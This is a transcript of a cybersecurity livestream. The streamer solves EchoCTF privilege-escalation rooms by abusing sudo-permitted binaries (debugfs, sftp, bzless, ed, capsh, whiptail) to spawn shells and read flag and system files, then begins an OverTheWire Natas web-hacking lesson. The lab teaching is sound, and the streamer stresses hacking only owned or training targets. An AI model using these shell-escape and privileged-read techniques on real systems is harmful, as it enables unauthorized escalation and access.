over to the calculator and then right-click on it and then inspect the element. No, we're not showing flags on stream. Not right now. Okay, so inside of here, we can take a look at the calculator. Calculator display. So this is what it reads over here. It currently reads 0, but if we click into it, we can delete the number 0. We can paste in our really big number and then hit enter. And then after we do that, we can click on the equal sign here, and it gives you the answer. So this is just a slightly hackier way of doing of getting the answer. It kind of circumvents using the calculator in the first place, but we're always trying to come up with new methods to solve these challenges. Alright, so that was a guided walkthrough for the Calculator 3 challenge from Hack the Web. If you enjoyed this guided walkthrough, please click on the like and subscribe click on the like and subscribe buttons on the video and leave a comment underneath the video. But until next time, HackerFrogs out. Okay, so we're done with our demonstrations today, and now we can move on to the EchoCTF escape rooms. So if you want to try this out yourself, you can make an account over at EchoCTF and then log in. This is network number 9, just like what it says in the link. So what we're going to do is we're going to try solving this first challenge over here. It's called Anvil. And before we do that, I'm going to need to set up my timer because I forgot to do my timer. Okay, we'll give ourselves 45 minutes to do this challenge. Okay, and so we also need to connect to the VPN, because EchoCTF is one of those platforms where you need to VPN into the network. So we're just going to do that over here. Platform access. Thank you very much, Felipe Zapeta, for subscribing on YouTube. Thank you. So we got our EchoCTF VPN key, and this is going to get us access to the private network for EchoCTF. Okay, so we should be connected now. We just need to check over here with the and see if we have an interface. So ton0 is the name of the interface that's created by OpenVPN, and we've got an address, which means we're probably connected to the network. So after we do that, we're going to go to the Anvil challenge, and then we're going to power up the target. So it says the target is currently powered off. We're going to click here. How's your OS escalation skills? See if you can reach the final user ETS CTF. So usually there's not very much in the way of descriptions for these challenges, but I guess there's more here. Okay, so when each user you successfully escalate, there will be a flag on its home directory. This flag can be used as a password to directly switch to that user. So for example, switch user copper at a later time so you don't have to go through all the steps every time you reconnect. So to start the challenge, connect with Netcat. Why are we using Netcat instead of SSH? Your timer starts from the first time you connect to the service. Sick in the mind, hello, nice to see you here. We're just doing some challenges over at EchoCTF. So this is the one we're doing. Okay, so let's power up the target. And then we should be able to access the room after, well, access the bind shell. That is a bind shell. I haven't seen one of those in a while. Yeah, this is an example of connecting with the bind shell. So it's well, it is elite, so that's awesome. That's great. Okay, so I guess we'll go over to our remote access tab. Isn't NC and Telnet without any encryption? It is without encryption, which means if there was somebody who was listening in on the network traffic, they would know exactly what all the instructions we're sending over would be. So I'll wrap this. Okay, so we're copper at Anvil, great. And what we need to do is we need to get access as the other users. So there's two. There's three. Actually, there's four. Never mind. So there's 4 users we need to escalate as. So there's the copper user, then I'm guessing silver, and then gold, and then after gold, ETS CTF. And once we get access as this user, we've finished the challenge. Netcat is an SSL is an option, packaged with Nmap. I didn't know about that. Huh, sick in the mind. It's Netcat and Telnet are both plain text. Yeah, I mean I mean, that's one of the big reasons why they decided not to use telnet anymore. Okay, so I guess sudo l. Okay, so we do have sudo l permissions, which we're going to try to use to get access to the other users. So you can run the following commands on Anvil. So as the silver user with no password, you can use debug fs. I mean, is this a standard command? My first instinct is to go over to GTF bins and figure out if this is in the GTF bins list. So GTF bins is a big curated list of Unix-like executables that can be used to bypass local security restrictions. And what was the name of that command? Debug fs. There it is. So this is a documented way of abusing this particular command. So debug fs, this executable can spawn an interactive system shell. This function can be used by any unprivileged user. So debug fs, so just run the program, and then inside the program you can run system commands. So kind of like, yeah, so a few different utilities in Linux let you run system commands during execution. And in this case, I guess we could open up like a bash shell. So let's go ahead and try that. Sudo user silver sbin debug fs. Okay, and then we can... What is even this command? I don't know. I don't know what the command is actually supposed to be for. I mean, debug, I'm guessing, is for fs file system, so it's some sort of debugging program for the file system. So exclamation point bin bash, and now we're the silver user. Okay, so I guess we can give this, we can use our good old the shy 31 flag, because we've leveled up to the next place. Let's see. Hey bro, what should I call you? Well, I'm the Shy Hat, so you can call me the Shy Hat or whatever you want, or Frog or whatever. So for the initiated, man debug fs. So I mean, let's give that a try. Debug. So this is I mean, this seems to be a standard Linux utility. So file system debugger. So ext2, ext3, ext4, great. So the debug program is an interactive file system debugger. It can be used to examine and change the state of an ext2, 3, or 4 file system. I mean, I'm not too sure exactly what this thing does, but as a hacker, my job is to figure out how to abuse security with it. Okay, it's a RAM-based virtual file system in Linux, usually mounted at the system kernel debug, specifically designed for kernel developers to easily expose debugging information variables to the user space. Thank you very much, sysOS. Okay, so that was step 1. So we're now the silver user, and we probably want to become the gold user next. So we'll do the same command, sudo l. So user silver may run the following commands on Anvil. So as the gold user with no password, we can do sftp. So FTP is file transfer protocol, and SFTP is secure file transfer protocol. Okay, oh, HexAbleSec just rated the channel with 1 viewer. Hey, welcome to the stream, HexAbleSec. If you have a password generally, sudo l shows a new output. I mean, generally when you do sudo l, they'll usually prompt you for a password, but this file system is set up in a way where we don't need to. Anyways, let me put on my new music, and then we'll keep going. Okay, HexAbleSec says, I'm good, how are ya? Yeah, we're just doing some good old Linux security exercises. Okay, so we can use userbin sftp. I mean, I don't think I've ever used this command before, The service I'm kind of familiar with, although I don't think I've ever really used it myself. So Secure File Transfer Protocol. I mean, like the previous one, we could see if there's an entry on GTFO bins. Yeah, it's here. So we can open up a shell with secure FTP as well. I mean, it's good that we're able to. I guess this is an easy level challenge, so we can use, you know, well-known websites like this. Anytime you transfer files with SSH, you're using the secure FTP server. Oh, okay. Okay, OS man says, I want your guidance. I want to be a hacker, but honestly, I don't know where to start. Could you help me with that? Yeah, we've got a website. It's called, it's over on the Reddit that helps people get into cyber. So it starts with some a few fundamental questions. You can watch a video. You can start answering some survey questions. But I hope the guide helps you. So SFTP shell. So what can we do with this? So this executable can spawn an interactive system shell. This still requires its successful connection to the server. So we're running this as sudo. This function is performed by a privileged user if executed by a sudo because the acquired privileges are not dropped. So we just... SFTP user at attacker.com. I mean, I guess we can replace this with localhost. Are we connecting to our, can we connect to our own server? Let's give it a try. So we can sudo as user gold with user bin sftp. So we're given a usage. So we need to connect to something. Hexa editor, I'm hunting right now. What's up? What is up, Hexa editor? We're just doing some exercises over here. And Hexablesec, what were you working on in your stream? Let me know. I know that Hexablesec works. You work as like a network security tester, right? Or network security, web app security. But what kind of fun stuff were you getting up to on your stream? Okay, so user at gold at localhost. Okay, so connection refused. Connection closed, connection closed. Okay, I mean, I guess we're not connecting to localhost. Hacking boxes with AI like vibe hacking. Oh, we're using some sort of MCP client? Is that what it's called? Okay, so we're trying to figure out how to use SFTP. If there are environment variables involved, they must be passed in by a sudo var equals value. The executable can also upload local data. I mean, I guess what we need to do is we need to connect to our own machine. So let me figure out how to start up my my SSH server on my attacker machine. So it would be systemctl. So maybe sudo system ctl start SSH like this. Okay. So I guess I should be serving SSH right now then. Oh, I deleted the MCP and currently testing Gemini. Huh. I mean, I don't think I've used Gemini as a vibe hacking tool before. Let's give this a go. So it'd be something like... So the Shy Hat, I can try to log in with FTP as my user, the Shy Hat. Over here. Okay. Okay. what do we do from here? We just open up bin bash. Ah, okay, great. And now we're, well, I should probably shut down my my FTP server. Sudo systemcpl stop SSH. Okay, done. And thank you very much for following Einfacht nur Jules. I'm not too sure how to pronounce that. Okay, so server on the target, then break out into the shell. Yeah, so we just did that. Over here, we connected to our own attacker server, and then we broke out of the command into the gold user. So I guess we can give ourselves another flag. So these over here. Yeah. You know what I haven't been doing? I haven't been catting out the flags. Hold on. Okay. So shouldn't there be a flag in here? Thank you very much for following on Twitch, Ape Snipes. Thank you very much. Okay, I'm sorry it's German, but honestly I experienced much worse pronunciations. Let's see. I didn't do CTFs a lot of time. Do you have any good websites that you recommend? Yeah. Yeah, I mean, we've got a lot on our education resources. So this link over here. I also recommend sites like TryHackMe's good for beginners, and PicoCTF is good for beginners as well. PicoCTF, this one. Pico is epic. Yeah, for sure. Okay, so, they mentioned that there were flags somewhere, right? Let's go back. So in each user that you successfully escalate, there'll be a flag on its home directory. There'll be a flag in its home directory. This flag can also be used as a password to switch to that user at a later time. Wait, where's the flag? Am I missing something? So home gold ETS CTF, not a directory. Oh, do we just run it then? Cat ETS CTF. Okay, so this is one of the flags. So I'm just going to copy this and submit it. Okay, I think they rebranded. What are we talking about? Ah, okay. Thanks, I came from mainly Hack the Box and Natas. Yeah, oh, HexEditor. So, I mean, it sounds like you've got some previous CTF experience. So, I mean, if you're looking for some more advanced CTFs, I'd say Vulnix is good. So these next two platforms are platforms where you need to download virtual machines and deploy them. So Vulnix is good, so is hackmyvm.eu. Xable Sec, I'm going to lurk heading to bed. No worries, and thank you very much for raiding in. I appreciate it a lot. And what else is good? Standoff. Standoff 365. Standoff365.com. This is a very good website if you're a little bit more advanced. I'm checking it out now. I got a bit bored from hunting all day, bug hunting stuff. I mean, if you're looking at like web app stuff, are you like a web app person, HexEditor? Can you do AD labs in the future? Yeah, I mean, I'd like to do more AD labs in the future, but I need to do more planning for AD labs. But I definitely like to. KH, yeah. Web app stuff, yeah, okay. So if you're more into web app stuff, what site has got some really good web app stuff? Let me think. Web apps all day is kind of tiring. Oh, I mean, yeah, I mean, you don't... Yeah, check out the education links. There's stuff from all sorts of categories in there. So what are we doing as the gold user? So user gold may run the following commands on Anvil. As the ETS CTF user, they can run bin bz less. Bz less, that sounds like a standard command as well. Bz less. HackSmarter? Yeah, you could definitely check out HackSmarter. Recommendations where I can sharpen my network programming skills for hacking. Network programming skills for hacking. Well, I mean, like I said before, check out the education links. There's some good stuff for programming there too. Okay, so BZ less. Okay, BZ less no matches. I mean, is this a standard Linux program? Linux BZ less. BZ less is a Linux command line utility used to view the contents of bzip2 compressed text files. Okay, one screen at a time without needing to decompress them first. It acts as a pager similar to less. I mean, if it's a pager similar to less, then it should have the same sort of privilege escalation steps that would be for less. So if we go over to GTFO bins and we just do less, we might be able to use the same thing. tar xzf mom, I know Linux. Yeah, I mean, it's pretty... You know, I keep on forgetting that command as well. Just look for less or GTFO bins, it'll be the same. It should be the same, because it's given that impression. So sudo user ets CTF bin bz less. Okay, so let's see. Usage is bz less and then files. So we'll run it on some really big file. Run it on... Wow, thank you very much. Mark in Luberda? Mark in Luberda, thank you very much for becoming a gold level HackerFrogs member on YouTube. Thank you very much, I appreciate that a lot. Let's give you a fun video redeem. How about some Nyan Cat? There you go. Thank you very much for becoming a member, Mark in Luberda. If I'm not pronouncing that correctly, let me know how to pronounce it. Thank you. Okay, so what's a really big file that we could edit? I don't know, etc. Password? Okay, and then we can just break out of here with like exclamation point bin bash. And then who am I? We're ETS CTF. That was a lot easier than I thought it'd be, but you know what? This was just the first room. We could maybe do a couple more. Permission denied. Okay, let's move into our own directory. And we can read the final flag here. Okay. So let's submit this flag. And I think, I mean, we've pretty much completed the challenge here. So what we can do is we can do this. I liked this one though. I mean, I think it was a good warm-up exercise.
What are you?
I'm system root.
Okay, KH, you're talking about AD, because my main target in network pen testing and working in organizations. Yeah, I mean, I got you, man. I actually created quite a few walkthroughs for machines with Active Directory on my YouTube channel. So let me see if I can get you like a playlist. So let's see. I should have like a playlist for Windows stuff. Active Directory challenges. Well, I mean, we've got 2 Active Directory challenges, but I think there's more Active Directory stuff in the Windows hacking challenges list over here. Let me get you that list. AD HackSmarter. I think HackSmarter has a couple of Active Directory challenges. I'm not sure if they're free though. But the playlist is right here. And I think we've also got something for Windows. I think we also have stuff for Windows at the education resources. Let me see if I can grab you a list. So let's see, network hacking. Do I have something for Windows specifically? It might be in here. Okay, just a second. Maybe in computer networking? No, not these ones. Yeah, I'm sorry I can't get them for you right now. But you know what? Hit me up on Discord or Reddit, and maybe I can help you locate those resources. Okay, so I think we just finished this challenge. Let me get out of here. Press return. So that was gold. Silver? Let me get the flag for silver. Okay, we got a flag over here, and I don't think there's a flag for copper. TCM is a pretty good YouTube series about AD, but it only goes over a little. I mean, the other 2 websites I was talking about over here, Vulnix. So Vulnix has a number of Active Directory machines. Thank you very much for subscribing on YouTube, Prem Kumar, thank you. So Vulnix and HackMyVM, they both have like a limited number of Active Directory machines. I think across the 2 platforms there are something like 12 Active Directory machines. It's a pretty good start for people who are doing Active Directory challenges, especially from like a free perspective. Brouhaha says like half the PAH if I remember. It only goes over a little bit. I mean, I haven't gone over the materials over at TCM. Maybe I should. I'm not too sure what their streaming policy is. Okay. So are we done? I guess there's one more flag over at copper, maybe? How do we get out of here? How do we quit out of this program? Okay, this is where we search for debugfs. Exit. Okay, so exit the interactive debugfs tool. Type quit. Oh, quit. It's not exit, but it's quit. Okay, quit. Okay, done. Great. So there's no flag here. Huh. I wonder which one I'm missing. So 4 flags, 3 app, and 1 environment. Okay, so if there's an environment flag, Oh, it's probably going to be like the etc password file. No, it's not the etc password file. So the ETS CTF account, I hope it wasn't accessed using the ETS CTF account. What I'm going to do is I'm going to blank my screen for a little bit, because sometimes these terminals expose my IP address, and I don't want my actual IP address to be exposed. So just a second, everybody. I'm going to blank this out. Okay, so I find the flag over here. Let me just copy this. And did it actually... It doesn't actually expose my IP address. That's great. Okay, so we'll submit this flag and I think we'll be finished. Zane asks, where did you learn Python? I learned Python on my own for the most part, but there's a few really good courses if you want to learn Python. You're in the cloud, right? The cloud bed. Yeah. Okay, so if you go to education resources over here, and then you go over to programming, there's some really good programming courses for Python you can look up. Matthew says, it's my last year in uni, and I'd like to know if web dev is a good career path to take. I'd like to be a full stack web developer. And I want you to code a tool or whatever. I mean, we've got a pretty set schedule over here. You could suggest it for a future stream, maybe, if you wanted to. Okay, so let's... Thank you very much for subscribing on YouTube, Jimmy. Much appreciated. Okay, let's do some more of these escape rooms. How much time do we have left? 14 minutes? I don't know if we're going to be able to do a whole room, but we'll give it a try. So the next one is called Cretin. Cretin or Cretin? How do you pronounce this, guys? Let me know how to pronounce this word, because I don't say it very often. Cretin or Cretin? Okay, we'll start this up. How is your OS escalation skills like? Ooh, nope, we want to... power up the target. Okay. Okay, so Matthew was talking about last year in uni, you want to know if web dev is a good career path. Is your university program focused around web development? What kind of university program are you taking? Is it computer science general, or is it something more specific? Okay, so did that load up? So this one is... Yeah, so here's the IP of the target. So on each user you successfully escalate, there'll be a flag on its home directory. This flag can be used as a password to directly switch to that user, so su dribble, at a later time that you don't have to go through all the steps. To start the challenge, connect to here. Okay, great. Okay, I think it's Cretin. I mean, it's hard to know because I don't hear it very often. Cretin, okay. Simon or Dante, hello, nice to see you here. Happy Good Friday. It's Easter soon. Okay. And we're now the Nibble user. Okay, so the first thing we'll do is we'll check out who all the users are in this server. So there is Nibble, Dribble, Scribble, and ETS CTF. So we need to escalate 3 times to become the highest level user. So let's see, and Raspberry Pi says, I'm 37, I'm too old to get into hacking. Am I too old to get into hacking? You're 37. I mean, I don't think so, Raspberry Pi. I got into hacking right after I turned 40. So I wouldn't say so. SysOS says the difference between the two is whether or not you are a jank or a git. A jank or a git? A yank versus what? I don't know. Is that what? Banger. I mean, we're playing some StarCraft music right now from StarCraft 2. Matthew says it's centered around application development, but I have been learning web dev on my own, and I've really enjoyed it. Perhaps you do code reviews on the channel? No, I don't do code reviews. I'm not qualified to do code reviews. Cray as in cray, like crayon. Ton as in tone. French nasal sounding ending. Crayton? Craytone? I'm not too sure. You don't sound 40. I'm in my mid-40s right now. Git is jit? That's what I'm referring to. Oh, okay. Let's see. You need at least 40 years of experience at 37. I mean, that's kind of a joke on what they put on the job applications, the job listings rather. Yeah, I don't think 37 is too old. Just keep on. You just need to be passionate about. You just need to be passionate. If you're not passionate about something, you're not going to succeed. Okay, so what's going on here? So the user nibble might run the following commands on cretin. It's called cretin? Okay, sure. As dribble, we can use the ed command. Ed is text editor, right? So it'd be sudo user dribble bin ed. Okay, let's see. VT says, I learned at 46, 52 now, and still popping shells. Get to it. Yeah, I mean, just, I'm 41, so I'm safe. Sure. No worries. It doesn't matter how old anybody is. You just need to take care of yourself and start learning. Do you have a radio voice or a really good mic? I mean, maybe both? I did try to look into doing voiceover work earlier in my life. But yeah, we're looking for the ed command. So ed is a text. It's like a text editor, right? So this executable can spawn an interactive system shell. This function can be performed by any unprivileged user. We're using sudo though. So ed and then bin sh. Okay. Hi there, please state the capabilities of the current tasks. So we're currently doing some exercises over at this website called EchoCTF, and on each one of these challenges we need to elevate our privileges using specific Linux binaries. Okay, SysOS says ed is the text editor as in the OG. Oh, okay. KH says I watched many AD videos that they often misrepresent real-world scenarios. They suggest the machine lacks Windows Defender or that it's turned off, which isn't true. In practice, security tools like Windows Defender, firewalls, EDR, and NDR are used with clients. I mean, that's true, but you should start learning on less difficult environments. If you want to deal with AD environments where it is more difficult, then what I would suggest is signing up for Hack the Box. So get yourself a monthly subscription over at Hack the Box, because they've got I'm gonna say something like more than 100 different Windows Active Directory boxes that you can hack against. And the higher level ones are, yeah, they're difficult. So this is what I would suggest to you if you're really serious about learning about Windows Active Directory attacks. J Money says, I like the StarCraft music in the background. I'm trying to keep it old school. Okay, so let's run the thing, and then bin bash. It's just that easy, folks. You just need to bin bash every time you use one of these interactive terminals. Okay, so let's move into the directory for the new user. So we're dribble now, and we've got a flag over here. So let's read that. Okay. And we'll submit that flag, and then we'll move on to the next challenge. Okay, Alf says, I mean, I'm a full stack developer. That should help, right? What are we talking about? Thank you very much for subscribing on YouTube, Mr. Abdella. Thank you. And thank you very much for subscribing, Rawlerson. Thank you very much. Okay, so we'll submit our flag, and then we'll move on to the next thing. Okay, we got 400 points for Cretin. Great, thank you. Okay, so the next user we need to target is the Scribble user. So we started as Nibble, now we're Dribble, and the next user we need to compromise is Scribble. Flanders fan, hello, nice to see you here. So this is CapSH. I'm pretty sure I've done CapSH privilege escalation on another box. But CapSH is going to give you the capabilities. Does it let you run certain commands with different capabilities? Let's take a look at good old GTFO bins. CapSH. So this has a shell capability here. This function can be performed by any unprivileged user. So just CapSH, and then just for context, man CapSH. Okay, so CapSH is the capability shell. Oh, okay. So it lets you run a shell with specific capabilities. Okay, Alf says, learning to hack, I should be on the right track if I'm a full stack developer, right? I mean, what are you developing web applications, Alf? Or what kind of applications are you developing? Do you have any Hack the Box playlists? I'm afraid I don't deal with Hack the Box very often. There are probably like a bunch of different curated lists for people who want to do Hack the Box Active Directory machines. So let's see. We've got a Reddit thread over here. Good boxes for learning AD pen testing. I'll leave the link in the chat for you guys to take a look at if you like. Okay, Alf says, yes sir, on C# I started with Python. Do you use Vim? I can use Vim. It's not my go-to text editor. Season 8 had some AD bangers. I mean, if Brouhaha thinks so, then I'm inclined to believe. Love your overlay. Thank you very much, Flanders fan. But yeah, I mean, let's see. So this function is performed by the privileged user if executed by sudo. So because CapSH creates a terminal, we can use CapSH with sudo to assume the identity of our user here. So let's see, over here, sudo user scribble sbin capsh -- and now we're the Scribble user. Okay, great. Thank you very much for subscribing on YouTube. Evanter? Let me know how to pronounce that. But we can give ourselves our little flag. Just like this, because we got a new flag. Okay, let's submit this. So, I mean, these, it's kind of easy going forward so far, but I'm sure we'll hit a wall eventually. Okay, so we got the new flag. We just need to do one more, and then we'll be finished with the system. So ETS CTF may run, well, we can run sudo as ETS CTF with no password. Bin whiptail. I've never heard of this. Is it on GTFO bins? It might not be. It is here. Okay. So what is this? So this executable can read data from local files. So this is privileged file read. This is privileged file read, but we know that there's a flag that can be used as a password in each user's directory, so we could probably read that file and get the password. Are you the guy that hacked Axios? No. I'm not the person that hacked Axios. But welcome to the stream, Moza. Nice to see you here. Okay, so if we're running it as sudo, so whiptail text box scroll text path to file input and then 00. So we use something like this, and we just need to reference the password file for this user. Ooh, the input got a little bit weird. Sudo user ets CTF, and then we need to reference home slash ets CTF slash ets CTF, because that's the name of the flag. Oh, we need to put in our password? What do you mean we need to put in our password? Okay, let's... So ets-ctf, no password, bin whiptail. Is it because we didn't reference the /bin over here? Okay, I think we can finish this in the next 10 minutes. So I'm going to put 10 minutes on the clock. And let's see if we can finish it in 10 minutes. Timothy, hello, nice to see you here. Okay, 10 minutes, let's see if we can finish it. And then we'll move on to our web app hacking demonstration lesson. Okay, so we'll run the same command here. We need to make sure that it's /bin whiptail. Permission denied. Permission denied. Sudo u ets-ctf bin whiptail text box scroll text. So we get permission denied. No such... Oh, it's denied because there's no such file or directory. Okay. So the ets-ctf file is in each one of these users directories. ets-ctf... Let me check the home directory again. Yeah. So root no group. Man, the terminal is all sorts of messed up here. Okay, let me copy this command. I'll start editing it on another terminal. So let's try referencing like a common file. So maybe home ets-ctf. Maybe they've got like a bash history that we can read. We'll give it a go. Sometimes privileged file read can be a bit tricky. Permission denied, no such file or directory. So what other files could we try reading? So not bash history, maybe .ssh? Maybe some IDRSA? So that would be an SSH private key. Okay, also doesn't exist. So home ets-ctf. Okay, and thank you very much for subscribing on YouTube, Darkly Mamoosh Ltd. Thank you. Try running on a file that you know exists. Yeah, I think I'm going to be doing that next, JMoney. And Mozilla Millas. Making a database for users with 3 user types. I'm thinking it's probably better for performance to just make 3 tables for each type. What do you think? I mean, I'm not really an app developer, Moza, but if somebody is an app developer, let me know. Please let us know in chat what you think is the best way to do it. Okay, let's do etc password. And see if it works. So it doesn't like this text box thing. Maybe it's the so text box scroll text. Maybe I just need to get rid of this stuff. Okay, so I can read it if I get rid of that stuff, the extra parameters. So we'll try reading the flag. Whoops. So the flag would be at home ETS CTF. ETS CTF. ETS CTF. Okay, and we can read it. So we can, I mean, this is the password for the user. So we can probably just become that user then. And we're done. Great. So I guess we can do this.
What are you?
I'm system root.
Okay, so we finished the exercise. Let me just grab the flag, and then we can submit these, and then we'll be done. I think there's one more. That's in the environment variables. Nope. It's not in the environment variables. Where is it then? Because we just submitted this. So it says there are 4 flags, 3 app, and the environment flag. So we submitted those 3. We got this one, Scribble. We got one for Dribble. We got one for ETS CTF. Where's the environment one? Is it in, like, etc shadow? Nope, we can't read etc shadow. Huh. I wonder where the thing is. So it's not an environment variable. Where else could it be hiding? What about dot profile? Maybe. Not here. Music? I mean, was there a music directory? Okay, so we belong to no group. I wonder if there's music in the background. Oh, this is StarCraft 2. StarCraft 2. Is it an etc password? No, it's not an etc password. Where is that environment variable going to be? It sounds like it's from The Hobbit. By the way, is this a CTF? Yeah, this is a CTF we're doing right now. It's this over here. So we discovered these flags already. There's just one more flag that we're missing. This is what I really don't like. I don't like hunting around for flags. So there's an environment variable flag. Usually environment variable flags are going to be either in etc password, etc shadow, or maybe in temp? No? In here maybe? Nope, not here either. Where is the last flag? We've got EchoCTF here. I wonder what files our group owns, because we're part of no group. Find / group. No group. Have a bunch of processes. Oh well. I mean, if we don't, if we run out of time, I guess we run out of time. It'd be nice to be able to get that last flag. Is it part of, which distribution are you using? We're using Kali Linux right now. Maybe it's in some other user's environment variable. So it's not this one. It's not this one. Oh, it's here. Why is it only in the first user's environment variable? That doesn't make much sense. Anyways, got the flag. Submit the darn thing. Okay, and then we're finished. Okay, great. All right, so we're gonna move on to our next part of the stream. All right, let me go ahead and switch up the music, and then we can get started. How did he get that? Oh, the environment variable flag? I just needed to switch up to another user. So the environment variable flag was actually on the first user's environment variables. Anyways, okay, let's do an hour for our class. So we're going to be learning about web app hacking basics. So if you don't know anything about web app hacking, you might learn a thing or two, but let's go ahead and get started. So we're done with this. Just close this stuff out. So this is part of HackerFrogs AfterSchool. It's a little program I designed that teaches people about different skills that they need to learn to get into hacking in different categories. So we're doing topic number 3. Topic number 4 is on deck. And let me get my session notes. OSINT 2? Do you think AI hacking tools are a thing by now? I mean, they can certainly be a thing. It's whether or not you feel like spending a bunch of money to run those AI tools. Okay, so we got session 0 over here. Alright, so let me do my introduction. FTL, FTW, yes. Okay, HackerFrogs AfterSchool Web App Hacking Intro. So welcome to HackerFrogs AfterSchool. It is a cybersecurity program for learning beginner cybersecurity skill across a wide variety of subjects. So this is the intro to web app hacking. What is web app hacking? Thank you very much. It's Slizo for subscribing with Twitch Prime. Much appreciated. Thank you. Let's give you a special video redeem for that. How about some Jurassic Park?
It's a Unix system. I know this. It's all the files of the whole park. It tells you everything.
Thank you very much once again for subscribing with Twitch Prime on Twitch. It's Slizo. If you want to do the same kind of thing, if you've got Amazon Prime, you can always give your favorite streamer, it might be me, a free subscription each month. Anyways, let's see. What do you think about Bug Bounty? Bug Bounty is for people who already know how to do web app hacking. It should not be your first job that you do in security, because you can go, if you're not skilled, you can go for months and months of work without making any money, and that doesn't sound like a very fun time. If you're a person who's looking for their first job in cybersecurity, I much more recommend that people do web app security or like web app pen testing as the first job as opposed to Bug Bounty. Okay, appreciate your stream. Also started with cybersecurity on TryHackMe. Awesome, it's Slizo. Great to hear it. Okay, so what is web app hacking? Web app hacking is the intentional abuse of systems and applications accessed via the internet by a user, which benefits that user in some way. So this benefit can take the form of access to unauthorized data or systems, the deletion of data, denial of website services, or any number of other benefits. In order to learn web app hacking, we must learn about the internet, how websites work, and a good amount about the technologies and software found in that space. Okay, Moza asks, how much do really good cyber bounty hunters make? Just curious. I mean, if you find really big bugs in really well-known web applications, you could earn $500,000 for a single bug, but it has to be a really serious one. So the answer is anywhere from $0 to $1 million. It's really hard to say. Okay, so most students know at least the basics of using a web browser and how to use websites. So we will build on those skills to establish a collection of techniques to explore and hack web applications found on the internet. Okay, Sick in the Mind says, I think the highest single bug I've heard of for a payout is 50K. 50K, I mean, I've heard of like much larger, much more ludicrous numbers, but I mean, those are probably just like hyperbolic examples. Not all companies are going to pay for that. Yeah, I mean, it really depends on how much money these companies have in their budgets for security for their bug bounty programs. But you know, you have to take everything I say with a grain of salt, because I don't do bug bounties. Those might have been a compound of multiple findings for a bigger payout. Usually RCE is like 50K. RCE is like 50K. Interesting. Okay, so while we're doing our web app hacking, it's important to note that at no time during our study of web app hacking will we engage in testing or hacking of websites or internet spaces that A, we do not own, or B, are not intentionally set up as learning environments for web app hacking education. So we are not going to be hacking anybody's website without their permission. MND says they're going to stop dropping in payouts with AI now. I mean, maybe. I think, I mean, some companies are choosing to leave the space altogether because there's just too many incorrect AI-driven, like, submissions. Okay, Thanto says, will they pay me if I dance and emote in front of their company door? Good question. I don't know if I can answer that question. Okay, so if we don't own the thing, or if we don't, if the thing isn't set up as a special environment for hacking, we're not going to be hacking it. But we're going to be dealing a lot with CTFs. So HackerFrogs AfterSchool classes prefer to incorporate CTF games into classes for a more interactive experience. But what are these CTFs? Sick in the Mind says the AI slop is producing low-quality bug bounty reports. Yeah, that's one of the big problems. So CTFs are Cybersecurity Capture the Flag, CTF games. They're training exercises where the goal of the exercise is to capture the flag through use of cybersecurity skills. In this context, capture means to gain access to a file or other resource, and flag refers to a secret phrase or password. So in these exercises, if you're able to get access to the flag, the secret phrase or password using your cybersecurity skills, then you've completed the exercise. So the CTF game we're going to be playing to learn basic web app hacking skills is called Natas, which is hosted on the over-the-wire CTF network. The over-the-wire network hosts several different CTF games. The Natas CTF game is made up of many levels of increasing difficulty, and the initial levels, from 0 to 10, are going to cover the target web app hacking techniques for this course. So what's next? In the next workshop, which we're doing right after this, we're going to be beginning our journey into web exploitation with the Natas CTF game. Okay, so let's go ahead and pull that up. Thank you very much for subscribing on YouTube, Mike Fitz. Thank you. Okay, let me just check that this is the correct document, because I've got a bunch of different versions of the darn thing in here. Yeah, this should be it. Okay, so this is our first web workshop for our Intro to Web App Hacking course. Before we start, let's introduce the learning materials we'll be working through in the course. Okay, once again, please state more capabilities. More capabilities? I mean, right now we're doing a web app hacking intro course. So the CTF game we're playing to learn basic web app hacking skills is called Natas, which is hosted on the over-the-wire CTF network. We just talked about this. Okay, so to learn about the Natas CTF rules, we'll navigate to the following URL. So it's overthewire.org, wargame Natas. So let's go ahead and grab that. I'll paste it into the chat. Okay. So let's take a look at what's going on in this game. So this is the Natas game. Natas teaches the basics of server-side web security. Each level of Natas consists of its own website located at http://natasx.natas.labs.overthewire.org, where X is the level number. There is no SSH login. To access the level, enter the username for that level. For example, Natas 0 for level 0 and its password. Each level has access to the password of the next level. Your job is to somehow obtain the next password and level up. All passwords are stored in the etc Natas webpass directory. For example, the password for Natas 5 is stored in the file etc Natas webpass Natas 5 and is only readable by Natas 4 and Natas 5. Thanto says, will you make an RE, reverse engineering introduction to someday? I mean, I plan on it. It's just that writing the course is a bit more difficult than I would have thought. But maybe someday. Okay, so we start here. So with username Natas0 and password Natas0, we have to access this website. So natas0.natas.labs.overthewire.org. So I'll paste this into the chat so that everybody can try this out yourself. So the username and password is both Natas0. So we're going to access the website on our web browser. Okay, so when we log in, it's going to ask us for the username and password in this little pop-up over here. So this is typical of all of the levels on the Natas CTF game. So what you need to do is you need to click into username, type in Natas0 because that's the username for the first level, and the password, paste in the same thing, Natas0. You can type it in yourself as well, it's fine. After you've done both of these, the username and the password, you can click on sign in. Okay, and then we don't need to save the password. So we see like a web page here. So the web page is typical for all the levels of Natas. It'll tell you the level that you're on, Natas 0 in this case, and it says on the web page you can find the password for the next level on this page. So if you if you've done these kind of CTF exercises before, let us know how you would typically try to look for the password. So the first steps you would try. So for people who've never done web app security challenges before, it might not be obvious what you're supposed to do here, because you certainly can't see a web page. You certainly can't see a password on this web page. There are no clickable links. Well, there is one clickable link, but that's not for this challenge. Okay, J Money says, I tried view source. So I mean, that's the first thing that we're going to be teaching in this course. Click the source, view the source. So a lot of people don't know, but what you see in your web browser is not the actual code that is sent by the web server to the web browser. So what we want to do is we want to look at the source code for this web page. You can right click and then you can choose view page source. This is pretty typical on no matter what your web browser is. So right click and then click on view page source. That'll let you see the source code for the website. So when you're designing a website, you write code that looks a lot like this to create each web page. And inside the web page, there's something called a comment. So a comment is whatever's between these arrows. So arrow with an exclamation point, and then another arrow over here. Whatever's in between these arrows is not going to be rendered out by the web browser. And in this case, it's a comment that says the password for Natas 1 is this. So this is the password for the next level, which is Natas level 1. So I'll copy this, just in case anybody wants to follow along. So Natas 1 and this password. So let's review what we learned in this level of the game. So this is Natas 0, and we're talking about HTTP source code here. So web browsers render out web pages based on the HTTP code provided by the web server. Every web browser allows us to view a web page's HTTP source code, and this is what we're looking at to get the first level's password. So for web app testing, this allows us to find interesting directories, developer comments, and more. So inside the web page source code, there can be a lot of clues and a lot of information about how the web page is set up, and maybe about how the website is set up. Okay, so let's go ahead and move on to the next level. So to access the next level, grab your password and copy it. Study bloggers, hello, nice to see you here. Okay, so 